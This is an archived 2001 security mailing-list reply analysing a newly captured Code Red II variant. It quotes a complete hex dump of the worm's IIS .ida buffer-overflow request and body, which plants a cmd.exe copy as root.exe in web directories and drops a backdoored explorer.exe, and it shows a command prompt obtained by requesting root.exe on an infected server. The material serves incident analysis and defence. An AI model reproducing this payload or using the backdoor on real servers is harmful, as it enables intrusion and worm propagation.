Re: new codered variant (very initial analysis)

From: Antony Riley (antonyat_private)
Date: Sat Aug 04 2001 - 13:38:32 PDT
Previous message: corecode: "new codered variant"
In reply to: corecode: "new codered variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
From looking at the strings in this:

I'm guessing here, but it looks like it copies cmd.exe to either the
/scripts directory, or the /MSADC directory in the inetpub root.

Which would basically leave any machine infected with it wide open to
attack.

I tried telneting back to a server that had sent the /default.ida?XXX...

results:

-----------------------------------------------------
GET /scripts/root.exe HTTP/1.0
 
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 04 Aug 2001 20:35:19 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
 
c:\inetpub\scripts>
-----------------------------------------------------

It looks like my initial analysis was correct.

On Sat, 4 Aug 2001, corecode wrote:

> hey ppl!
> 
> i just checked my logs and found the following brandnew cr variant:
> 
> Sat Aug  4 15:02:20 2001 from: 217.80.204.155:4177 len: 3818 MD5: 
> 5edc2375e7aca69f8c1a8d77c4ffff18 (new)
> 
> it seems just to use the original shellcode. currently i am disassembling it.
> 
> this is the code coming in, attached is the same stuff as binary.
> 
> as we might discuss on this worm and this one contains the string 
> "CodeRedII" and there is already a worm called CRv2 we need to use another 
> name to distinguish between both.
> As i am the first to post, i'll call it "iis.ida.root" (short: ida.root), 
> because "root" appears some time in the code.
> 
> cheerz
>    corecode
> 
> 
> 00000000  47 45 54 20 2f 64 65 66  61 75 6c 74 2e 69 64 61  |GET /default.ida|
> 00000010  3f 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |?XXXXXXXXXXXXXXX|
> 00000020  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
> *
> 000000f0  58 25 75 39 30 39 30 25  75 36 38 35 38 25 75 63  |X%u9090%u6858%uc|
> 00000100  62 64 33 25 75 37 38 30  31 25 75 39 30 39 30 25  |bd3%u7801%u9090%|
> 00000110  75 36 38 35 38 25 75 63  62 64 33 25 75 37 38 30  |u6858%ucbd3%u780|
> 00000120  31 25 75 39 30 39 30 25  75 36 38 35 38 25 75 63  |1%u9090%u6858%uc|
> 00000130  62 64 33 25 75 37 38 30  31 25 75 39 30 39 30 25  |bd3%u7801%u9090%|
> 00000140  75 39 30 39 30 25 75 38  31 39 30 25 75 30 30 63  |u9090%u8190%u00c|
> 00000150  33 25 75 30 30 30 33 25  75 38 62 30 30 25 75 35  |3%u0003%u8b00%u5|
> 00000160  33 31 62 25 75 35 33 66  66 25 75 30 30 37 38 25  |31b%u53ff%u0078%|
> 00000170  75 30 30 30 30 25 75 30  30 3d 61 20 20 48 54 54  |u0000%u00=a  HTT|
> 00000180  50 2f 31 2e 30 0d 0a 43  6f 6e 74 65 6e 74 2d 74  |P/1.0..Content-t|
> 00000190  79 70 65 3a 20 74 65 78  74 2f 78 6d 6c 0a 43 6f  |ype: text/xml.Co|
> 000001a0  6e 74 65 6e 74 2d 6c 65  6e 67 74 68 3a 20 33 33  |ntent-length: 33|
> 000001b0  37 39 20 0d 0a 0d 0a c8  c8 01 00 60 e8 03 00 00  |79 ........`....|
> 000001c0  00 cc eb fe 64 67 ff 36  00 00 64 67 89 26 00 00  |....dg.6..dg.&..|
> 000001d0  e8 df 02 00 00 68 04 01  00 00 8d 85 5c fe ff ff  |.....h......\...|
> 000001e0  50 ff 55 9c 8d 85 5c fe  ff ff 50 ff 55 98 8b 40  |P.U...\...P.U..@|
> 000001f0  10 8b 08 89 8d 58 fe ff  ff ff 55 e4 3d 04 04 00  |.....X....U.=...|
> 00000200  00 0f 94 c1 3d 04 08 00  00 0f 94 c5 0a cd 0f b6  |....=...........|
> 00000210  c9 89 8d 54 fe ff ff 8b  75 08 81 7e 30 9a 02 00  |...T....u..~0...|
> 00000220  00 0f 84 c4 00 00 00 c7  46 30 9a 02 00 00 e8 0a  |........F0......|
> 00000230  00 00 00 43 6f 64 65 52  65 64 49 49 00 8b 1c 24  |...CodeRedII...$|
> 00000240  ff 55 d8 66 0b c0 0f 95  85 38 fe ff ff c7 85 50  |.U.f.....8.....P|
> 00000250  fe ff ff 01 00 00 00 6a  00 8d 85 50 fe ff ff 50  |.......j...P...P|
> 00000260  8d 85 38 fe ff ff 50 8b  45 08 ff 70 08 ff 90 84  |..8...P.E..p....|
> 00000270  00 00 00 80 bd 38 fe ff  ff 01 74 68 53 ff 55 d4  |.....8....thS.U.|
> 00000280  ff 55 ec 01 45 84 69 bd  54 fe ff ff 2c 01 00 00  |.U..E.i.T...,...|
> 00000290  81 c7 2c 01 00 00 e8 d2  04 00 00 f7 d0 0f af c7  |..,.............|
> 000002a0  89 46 34 8d 45 88 50 6a  00 ff 75 08 e8 05 00 00  |.F4.E.Pj..u.....|
> 000002b0  00 e9 01 ff ff ff 6a 00  6a 00 ff 55 f0 50 ff 55  |......j.j..U.P.U|
> 000002c0  d0 4f 75 d2 e8 3b 05 00  00 69 bd 54 fe ff ff 00  |.Ou..;...i.T....|
> 000002d0  5c 26 05 81 c7 00 5c 26  05 57 ff 55 e8 6a 00 6a  |\&....\&.W.U.j.j|
> 000002e0  16 ff 55 8c 6a ff ff 55  e8 eb f9 8b 46 34 29 45  |..U.j..U....F4)E|
> 000002f0  84 6a 64 ff 55 e8 8d 85  3c fe ff ff 50 ff 55 c0  |.jd.U...<...P.U.|
> 00000300  0f b7 85 3c fe ff ff 3d  d2 07 00 00 73 cf 0f b7  |...<...=....s...|
> 00000310  85 3e fe ff ff 83 f8 0a  73 c3 66 c7 85 70 ff ff  |.>......s.f..p..|
> 00000320  ff 02 00 66 c7 85 72 ff  ff ff 00 50 e8 64 04 00  |...f..r....P.d..|
> 00000330  00 89 9d 74 ff ff ff 6a  00 6a 01 6a 02 ff 55 b8  |...t...j.j.j..U.|
> 00000340  83 f8 ff 74 f2 89 45 80  6a 01 54 68 7e 66 04 80  |...t..E.j.Th~f..|
> 00000350  ff 75 80 ff 55 a4 59 6a  10 8d 85 70 ff ff ff 50  |.u..U.Yj...p...P|
> 00000360  ff 75 80 ff 55 b0 bb 01  00 00 00 0b c0 74 4b 33  |.u..U........tK3|
> 00000370  db ff 55 94 3d 33 27 00  00 75 3f c7 85 68 ff ff  |..U.=3'..u?..h..|
> 00000380  ff 0a 00 00 00 c7 85 6c  ff ff ff 00 00 00 00 c7  |.......l........|
> 00000390  85 60 ff ff ff 01 00 00  00 8b 45 80 89 85 64 ff  |.`........E...d.|
> 000003a0  ff ff 8d 85 68 ff ff ff  50 6a 00 8d 85 60 ff ff  |....h...Pj...`..|
> 000003b0  ff 50 6a 00 6a 01 ff 55  a0 93 6a 00 54 68 7e 66  |.Pj.j..U..j.Th~f|
> 000003c0  04 80 ff 75 80 ff 55 a4  59 83 fb 01 75 31 e8 00  |...u..U.Y...u1..|
> 000003d0  00 00 00 58 2d d3 03 00  00 6a 00 68 ea 0e 00 00  |...X-....j.h....|
> 000003e0  50 ff 75 80 ff 55 ac 3d  ea 0e 00 00 75 11 6a 00  |P.u..U.=....u.j.|
> 000003f0  6a 01 8d 85 5c fe ff ff  50 ff 75 80 ff 55 a8 ff  |j...\...P.u..U..|
> 00000400  75 80 ff 55 b4 e9 e7 fe  ff ff bb 00 00 df 77 81  |u..U..........w.|
> 00000410  c3 00 00 01 00 81 fb 00  00 00 78 75 05 bb 00 00  |..........xu....|
> 00000420  f0 bf 60 e8 0e 00 00 00  8b 64 24 08 64 67 8f 06  |..`......d$.dg..|
> 00000430  00 00 58 61 eb d9 64 67  ff 36 00 00 64 67 89 26  |..Xa..dg.6..dg.&|
> 00000440  00 00 66 81 3b 4d 5a 75  e3 8b 4b 3c 81 3c 0b 50  |..f.;MZu..K<.<.P|
> 00000450  45 00 00 75 d7 8b 54 0b  78 03 d3 8b 42 0c 81 3c  |E..u..T.x...B..<|
> 00000460  03 4b 45 52 4e 75 c5 81  7c 03 04 45 4c 33 32 75  |.KERNu..|..EL32u|
> 00000470  bb 33 c9 49 8b 72 20 03  f3 fc 41 ad 81 3c 03 47  |.3.I.r ...A..<.G|
> 00000480  65 74 50 75 f5 81 7c 03  04 72 6f 63 41 75 eb 03  |etPu..|..rocAu..|
> 00000490  4a 10 49 d1 e1 03 4a 24  0f b7 0c 0b c1 e1 02 03  |J.I...J$........|
> 000004a0  4a 1c 8b 04 0b 03 c3 89  44 24 24 64 67 8f 06 00  |J.......D$$dg...|
> 000004b0  00 58 61 c3 e8 51 ff ff  ff 89 5d fc 89 45 f8 e8  |.Xa..Q....]..E..|
> 000004c0  0d 00 00 00 4c 6f 61 64  4c 69 62 72 61 72 79 41  |....LoadLibraryA|
> 000004d0  00 ff 75 fc ff 55 f8 89  45 f4 e8 0d 00 00 00 43  |..u..U..E......C|
> 000004e0  72 65 61 74 65 54 68 72  65 61 64 00 ff 75 fc ff  |reateThread..u..|
> 000004f0  55 f8 89 45 f0 e8 0d 00  00 00 47 65 74 54 69 63  |U..E......GetTic|
> 00000500  6b 43 6f 75 6e 74 00 ff  75 fc ff 55 f8 89 45 ec  |kCount..u..U..E.|
> 00000510  e8 06 00 00 00 53 6c 65  65 70 00 ff 75 fc ff 55  |.....Sleep..u..U|
> 00000520  f8 89 45 e8 e8 17 00 00  00 47 65 74 53 79 73 74  |..E......GetSyst|
> 00000530  65 6d 44 65 66 61 75 6c  74 4c 61 6e 67 49 44 00  |emDefaultLangID.|
> 00000540  ff 75 fc ff 55 f8 89 45  e4 e8 14 00 00 00 47 65  |.u..U..E......Ge|
> 00000550  74 53 79 73 74 65 6d 44  69 72 65 63 74 6f 72 79  |tSystemDirectory|
> 00000560  41 00 ff 75 fc ff 55 f8  89 45 e0 e8 0a 00 00 00  |A..u..U..E......|
> 00000570  43 6f 70 79 46 69 6c 65  41 00 ff 75 fc ff 55 f8  |CopyFileA..u..U.|
> 00000580  89 45 dc e8 10 00 00 00  47 6c 6f 62 61 6c 46 69  |.E......GlobalFi|
> 00000590  6e 64 41 74 6f 6d 41 00  ff 75 fc ff 55 f8 89 45  |ndAtomA..u..U..E|
> 000005a0  d8 e8 0f 00 00 00 47 6c  6f 62 61 6c 41 64 64 41  |......GlobalAddA|
> 000005b0  74 6f 6d 41 00 ff 75 fc  ff 55 f8 89 45 d4 e8 0c  |tomA..u..U..E...|
> 000005c0  00 00 00 43 6c 6f 73 65  48 61 6e 64 6c 65 00 ff  |...CloseHandle..|
> 000005d0  75 fc ff 55 f8 89 45 d0  e8 08 00 00 00 5f 6c 63  |u..U..E......_lc|
> 000005e0  72 65 61 74 00 ff 75 fc  ff 55 f8 89 45 cc e8 08  |reat..u..U..E...|
> 000005f0  00 00 00 5f 6c 77 72 69  74 65 00 ff 75 fc ff 55  |..._lwrite..u..U|
> 00000600  f8 89 45 c8 e8 08 00 00  00 5f 6c 63 6c 6f 73 65  |..E......_lclose|
> 00000610  00 ff 75 fc ff 55 f8 89  45 c4 e8 0e 00 00 00 47  |..u..U..E......G|
> 00000620  65 74 53 79 73 74 65 6d  54 69 6d 65 00 ff 75 fc  |etSystemTime..u.|
> 00000630  ff 55 f8 89 45 c0 e8 0b  00 00 00 57 53 32 5f 33  |.U..E......WS2_3|
> 00000640  32 2e 44 4c 4c 00 ff 55  f4 89 45 bc e8 07 00 00  |2.DLL..U..E.....|
> 00000650  00 73 6f 63 6b 65 74 00  ff 75 bc ff 55 f8 89 45  |.socket..u..U..E|
> 00000660  b8 e8 0c 00 00 00 63 6c  6f 73 65 73 6f 63 6b 65  |......closesocke|
> 00000670  74 00 ff 75 bc ff 55 f8  89 45 b4 e8 0c 00 00 00  |t..u..U..E......|
> 00000680  69 6f 63 74 6c 73 6f 63  6b 65 74 00 ff 75 bc ff  |ioctlsocket..u..|
> 00000690  55 f8 89 45 a4 e8 08 00  00 00 63 6f 6e 6e 65 63  |U..E......connec|
> 000006a0  74 00 ff 75 bc ff 55 f8  89 45 b0 e8 07 00 00 00  |t..u..U..E......|
> 000006b0  73 65 6c 65 63 74 00 ff  75 bc ff 55 f8 89 45 a0  |select..u..U..E.|
> 000006c0  e8 05 00 00 00 73 65 6e  64 00 ff 75 bc ff 55 f8  |.....send..u..U.|
> 000006d0  89 45 ac e8 05 00 00 00  72 65 63 76 00 ff 75 bc  |.E......recv..u.|
> 000006e0  ff 55 f8 89 45 a8 e8 0c  00 00 00 67 65 74 68 6f  |.U..E......getho|
> 000006f0  73 74 6e 61 6d 65 00 ff  75 bc ff 55 f8 89 45 9c  |stname..u..U..E.|
> 00000700  e8 0e 00 00 00 67 65 74  68 6f 73 74 62 79 6e 61  |.....gethostbyna|
> 00000710  6d 65 00 ff 75 bc ff 55  f8 89 45 98 e8 10 00 00  |me..u..U..E.....|
> 00000720  00 57 53 41 47 65 74 4c  61 73 74 45 72 72 6f 72  |.WSAGetLastError|
> 00000730  00 ff 75 bc ff 55 f8 89  45 94 e8 0b 00 00 00 55  |..u..U..E......U|
> 00000740  53 45 52 33 32 2e 44 4c  4c 00 ff 55 f4 89 45 90  |SER32.DLL..U..E.|
> 00000750  e8 0e 00 00 00 45 78 69  74 57 69 6e 64 6f 77 73  |.....ExitWindows|
> 00000760  45 78 00 ff 75 90 ff 55  f8 89 45 8c c3 8b 45 84  |Ex..u..U..E...E.|
> 00000770  69 c0 05 84 08 08 40 89  45 84 8d 84 04 78 56 34  |i.....@.E....xV4|
> 00000780  12 f7 d8 c1 c0 08 c3 e8  e1 ff ff ff 3c 00 74 f7  |............<.t.|
> 00000790  3c ff 74 f3 c3 e8 ed ff  ff ff 8a f8 e8 e6 ff ff  |<.t.............|
> 000007a0  ff 8a d8 c1 e3 10 e8 dc  ff ff ff 8a f8 e8 d5 ff  |................|
> 000007b0  ff ff 8a d8 e8 b4 ff ff  ff 83 e0 07 e8 20 00 00  |............. ..|
> 000007c0  00 ff ff ff ff 00 ff ff  ff 00 ff ff ff 00 ff ff  |................|
> 000007d0  ff 00 ff ff ff 00 00 ff  ff 00 00 ff ff 00 00 ff  |................|
> 000007e0  ff 59 8b 04 81 23 d8 f7  d0 23 85 58 fe ff ff 0b  |.Y...#...#.X....|
> 000007f0  d8 80 fb 7f 74 9f 80 fb  e0 74 9a 3b 9d 58 fe ff  |....t....t.;.X..|
> 00000800  ff 74 92 c3 68 04 01 00  00 8d 85 5c fe ff ff 50  |.t..h......\...P|
> 00000810  ff 55 e0 8d bc 05 5c fe  ff ff e8 09 00 00 00 5c  |.U....\........\|
> 00000820  43 4d 44 2e 45 58 45 00  5e fc a5 a5 a4 b3 63 6a  |CMD.EXE.^.....cj|
> 00000830  01 e8 1c 00 00 00 64 3a  5c 69 6e 65 74 70 75 62  |......d:\inetpub|
> 00000840  5c 73 63 72 69 70 74 73  5c 72 6f 6f 74 2e 65 78  |\scripts\root.ex|
> 00000850  65 00 8b 0c 24 88 19 8d  85 5c fe ff ff 50 ff 55  |e...$....\...P.U|
> 00000860  dc 6a 01 e8 2b 00 00 00  64 3a 5c 70 72 6f 67 72  |.j..+...d:\progr|
> 00000870  61 7e 31 5c 63 6f 6d 6d  6f 6e 7e 31 5c 73 79 73  |a~1\common~1\sys|
> 00000880  74 65 6d 5c 4d 53 41 44  43 5c 72 6f 6f 74 2e 65  |tem\MSADC\root.e|
> 00000890  78 65 00 8b 0c 24 88 19  8d 85 5c fe ff ff 50 ff  |xe...$....\...P.|
> 000008a0  55 dc e8 ba 05 00 00 fc  4d 5a 50 00 02 00 00 00  |U.......MZP.....|
> 000008b0  04 00 0f 00 ff ff 00 00  b8 00 00 00 00 00 00 00  |................|
> 000008c0  40 00 1a fc 00 00 01 fc  fc fc fc fc fc 00 00 50  |@..............P|
> 000008d0  45 00 00 4c 01 03 00 fd  2a 25 29 00 00 00 00 00  |E..L....*%).....|
> 000008e0  00 00 00 e0 00 8f 81 0b  01 02 19 00 04 00 00 00  |................|
> 000008f0  08 00 00 00 00 00 00 00  10 00 00 00 10 00 00 00  |................|
> 00000900  20 00 00 00 00 40 00 00  10 00 00 00 04 00 00 01  | ....@..........|
> 00000910  00 00 00 00 00 00 00 03  00 0a 00 00 00 00 00 00  |................|
> 00000920  40 00 00 00 04 00 00 00  00 00 00 02 00 00 00 00  |@...............|
> 00000930  00 10 00 00 20 00 00 00  00 10 00 00 10 00 00 00  |.... ...........|
> 00000940  00 00 00 10 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000950  30 00 00 0c 01 fc fc fc  00 00 00 00 00 00 00 00  |0...............|
> 00000960  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000970  00 00 00 10 00 00 00 10  00 00 00 04 00 00 00 08  |................|
> 00000980  00 00 00 00 00 00 00 00  00 00 00 00 00 00 20 00  |.............. .|
> 00000990  00 60 00 00 00 00 00 00  00 00 00 10 00 00 00 20  |.`............. |
> 000009a0  00 00 00 04 00 00 00 0c  00 00 00 00 00 00 00 00  |................|
> 000009b0  00 00 00 00 00 00 40 00  00 c0 00 00 00 00 00 00  |......@.........|
> 000009c0  00 00 00 10 00 00 00 30  00 00 00 04 00 00 00 10  |.......0........|
> 000009d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 40 00  |..............@.|
> 000009e0  00 c0 fc fc fc fc fc fc  fc fc fc fc fc fc fc fc  |................|
> 000009f0  fc fc fc fc fc fc fc fc  fc fc fc fc fc fc fc fc  |................|
> 00000a00  fc fc fc fc fc fc fc fc  fc fc fc fc fc fc 00 00  |................|
> 00000a10  00 00 00 00 00 00 00 00  00 00 00 00 00 00 68 04  |..............h.|
> 00000a20  01 00 00 68 d0 20 40 00  e8 61 01 00 00 8d b8 d0  |...h. @..a......|
> 00000a30  20 40 00 be 00 20 40 00  a5 a5 a5 a5 6a 01 68 d0  | @... @.....j.h.|
> 00000a40  20 40 00 e8 4c 01 00 00  e8 0c 00 00 00 68 c0 27  | @..L........h.'|
> 00000a50  09 00 e8 31 01 00 00 eb  ef 68 d8 24 40 00 68 3f  |...1.....h.$@.h?|
> 00000a60  00 0f 00 6a 00 68 10 20  40 00 68 02 00 00 80 e8  |...j.h. @.h.....|
> 00000a70  32 01 00 00 0b c0 75 26  6a 04 68 54 20 40 00 6a  |2.....u&j.hT @.j|
> 00000a80  04 6a 00 68 48 20 40 00  ff 35 d8 24 40 00 e8 0d  |.j.hH @..5.$@...|
> 00000a90  01 00 00 ff 35 d8 24 40  00 e8 0e 01 00 00 68 d8  |....5.$@......h.|
> 00000aa0  24 40 00 68 3f 00 0f 00  6a 00 68 58 20 40 00 68  |$@.h?...j.hX @.h|
> 00000ab0  02 00 00 80 e8 ed 00 00  00 0b c0 75 55 bd 9c 20  |...........uU.. |
> 00000ac0  40 00 e8 4c 00 00 00 bd  a8 20 40 00 e8 42 00 00  |@..L..... @..B..|
> 00000ad0  00 6a 09 68 b8 20 40 00  6a 01 6a 00 68 b0 20 40  |.j.h. @.j.j.h. @|
> 00000ae0  00 ff 35 d8 24 40 00 e8  b4 00 00 00 6a 09 68 c4  |..5.$@......j.h.|
> 00000af0  20 40 00 6a 01 6a 00 68  b4 20 40 00 ff 35 d8 24  | @.j.j.h. @..5.$|
> 00000b00  40 00 e8 99 00 00 00 ff  35 d8 24 40 00 e8 9a 00  |@.......5.$@....|
> 00000b10  00 00 c3 c7 05 d0 24 40  00 00 04 00 00 68 d0 24  |......$@.....h.$|
> 00000b20  40 00 68 d0 20 40 00 68  d4 24 40 00 6a 00 55 ff  |@.h. @.h.$@.j.U.|
> 00000b30  35 d8 24 40 00 e8 60 00  00 00 0b c0 75 49 a1 d0  |5.$@..`.....uI..|
> 00000b40  24 40 00 0b c0 74 40 be  d0 20 40 00 80 3e 00 74  |$@...t@.. @..>.t|
> 00000b50  36 46 66 81 7e fe 2c 2c  75 f2 c7 06 32 31 37 00  |6Ff.~.,,u...217.|
> 00000b60  81 ee cc 20 40 00 89 35  d0 24 40 00 ff 35 d0 24  |... @..5.$@..5.$|
> 00000b70  40 00 68 d0 20 40 00 6a  01 6a 00 55 ff 35 d8 24  |@.h. @.j.j.U.5.$|
> 00000b80  40 00 e8 19 00 00 00 c3  ff 25 60 30 40 00 ff 25  |@........%`0@..%|
> 00000b90  64 30 40 00 ff 25 68 30  40 00 ff 25 70 30 40 00  |d0@..%h0@..%p0@.|
> 00000ba0  ff 25 74 30 40 00 ff 25  78 30 40 00 ff 25 7c 30  |.%t0@..%x0@..%|0|
> 00000bb0  40 fc fc fc fc fc fc fc  fc fc fc fc fc fc fc fc  |@...............|
> 00000bc0  fc fc fc fc 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000bd0  00 5c 45 58 50 4c 4f 52  45 52 2e 45 58 45 00 00  |.\EXPLORER.EXE..|
> 00000be0  00 53 4f 46 54 57 41 52  45 5c 4d 69 63 72 6f 73  |.SOFTWARE\Micros|
> 00000bf0  6f 66 74 5c 57 69 6e 64  6f 77 73 20 4e 54 5c 43  |oft\Windows NT\C|
> 00000c00  75 72 72 65 6e 74 56 65  72 73 69 6f 6e 5c 57 69  |urrentVersion\Wi|
> 00000c10  6e 6c 6f 67 6f 6e 00 00  00 53 46 43 44 69 73 61  |nlogon...SFCDisa|
> 00000c20  62 6c 65 00 00 9d ff ff  ff 53 59 53 54 45 4d 5c  |ble......SYSTEM\|
> 00000c30  43 75 72 72 65 6e 74 43  6f 6e 74 72 6f 6c 53 65  |CurrentControlSe|
> 00000c40  74 5c 53 65 72 76 69 63  65 73 5c 57 33 53 56 43  |t\Services\W3SVC|
> 00000c50  5c 50 61 72 61 6d 65 74  65 72 73 5c 56 69 72 74  |\Parameters\Virt|
> 00000c60  75 61 6c 20 52 6f 6f 74  73 00 00 00 00 2f 53 63  |ual Roots..../Sc|
> 00000c70  72 69 70 74 73 00 00 00  00 2f 4d 53 41 44 43 00  |ripts..../MSADC.|
> 00000c80  00 2f 43 00 00 2f 44 00  00 63 3a 5c 2c 2c 32 31  |./C../D..c:\,,21|
> 00000c90  37 00 00 00 00 64 3a 5c  2c 2c 32 31 37 fc fc fc  |7....d:\,,217...|
> 00000ca0  fc fc fc fc fc fc fc fc  fc fc fc fc fc fc fc fc  |................|
> 00000cb0  fc fc fc fc fc fc 00 00  00 00 00 00 00 00 00 00  |................|
> 00000cc0  00 00 00 00 00 00 00 00  00 00 3c 30 00 00 00 00  |..........<0....|
> 00000cd0  00 00 00 00 00 00 84 30  00 00 60 30 00 00 4c 30  |.......0..`0..L0|
> 00000ce0  00 00 00 00 00 00 00 00  00 00 91 30 00 00 70 30  |...........0..p0|
> 00000cf0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000d00  00 00 00 00 00 00 9e 30  00 00 a6 30 00 00 be 30  |.......0...0...0|
> 00000d10  00 00 00 00 00 00 c8 30  00 00 dc 30 00 00 ee 30  |.......0...0...0|
> 00000d20  00 00 fe 30 00 00 00 00  00 00 9e 30 00 00 a6 30  |...0.......0...0|
> 00000d30  00 00 be 30 00 00 00 00  00 00 c8 30 00 00 dc 30  |...0.......0...0|
> 00000d40  00 00 ee 30 00 00 fe 30  00 00 00 00 00 00 4b 45  |...0...0......KE|
> 00000d50  52 4e 45 4c 33 32 2e 64  6c 6c 00 41 44 56 41 50  |RNEL32.dll.ADVAP|
> 00000d60  49 33 32 2e 64 6c 6c 00  00 00 53 6c 65 65 70 00  |I32.dll...Sleep.|
> 00000d70  00 00 47 65 74 57 69 6e  64 6f 77 73 44 69 72 65  |..GetWindowsDire|
> 00000d80  63 74 6f 72 79 41 00 00  00 00 57 69 6e 45 78 65  |ctoryA....WinExe|
> 00000d90  63 00 00 00 52 65 67 51  75 65 72 79 56 61 6c 75  |c...RegQueryValu|
> 00000da0  65 45 78 41 00 00 00 00  52 65 67 53 65 74 56 61  |eExA....RegSetVa|
> 00000db0  6c 75 65 45 78 41 00 00  00 00 52 65 67 4f 70 65  |lueExA....RegOpe|
> 00000dc0  6e 4b 65 79 45 78 41 00  00 00 52 65 67 43 6c 6f  |nKeyExA...RegClo|
> 00000dd0  73 65 4b 65 79 fc fc fc  fc fc fc fc fc fc fc fc  |seKey...........|
> 00000de0  fc fc fc fc fc fc fc fc  fc fc fc fc fc fc fc fc  |................|
> *
> 00000e40  fc fc fc fc fc fc fc fc  fc fc fc fc 00 00 00 00  |................|
> 00000e50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000e60  00 5e bf b9 05 00 00 6a  07 e8 10 00 00 00 64 3a  |.^.....j......d:|
> 00000e70  5c 65 78 70 6c 6f 72 65  72 2e 65 78 65 00 8b 04  |\explorer.exe...|
> 00000e80  24 88 18 ff 55 cc 83 f8  ff 74 4d 89 85 4c fe ff  |$...U....tM..L..|
> 00000e90  ff ac 8a f8 38 3e 75 27  6a 20 e8 23 00 00 00 00  |....8>u'j .#....|
> 00000ea0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
> 00000eb0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 6a  |...............j|
> 00000ec0  01 56 ff b5 4c fe ff ff  ff 55 c8 46 4f 75 c5 ff  |.V..L....U.FOu..|
> 00000ed0  b5 4c fe ff ff ff 55 c4  fe c3 80 fb 64 0f 86 4c  |.L....U.....d..L|
> 00000ee0  f9 ff ff c3 61 c9 c2 04  00 90                    |....a.....|
> 00000eea

-- 
-Antony

Security is like duct tape, it has a dark side, and a light side.


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Wayne Conrad: "CRV3"
Previous message: corecode: "new codered variant"
In reply to: corecode: "new codered variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:53:15 PDT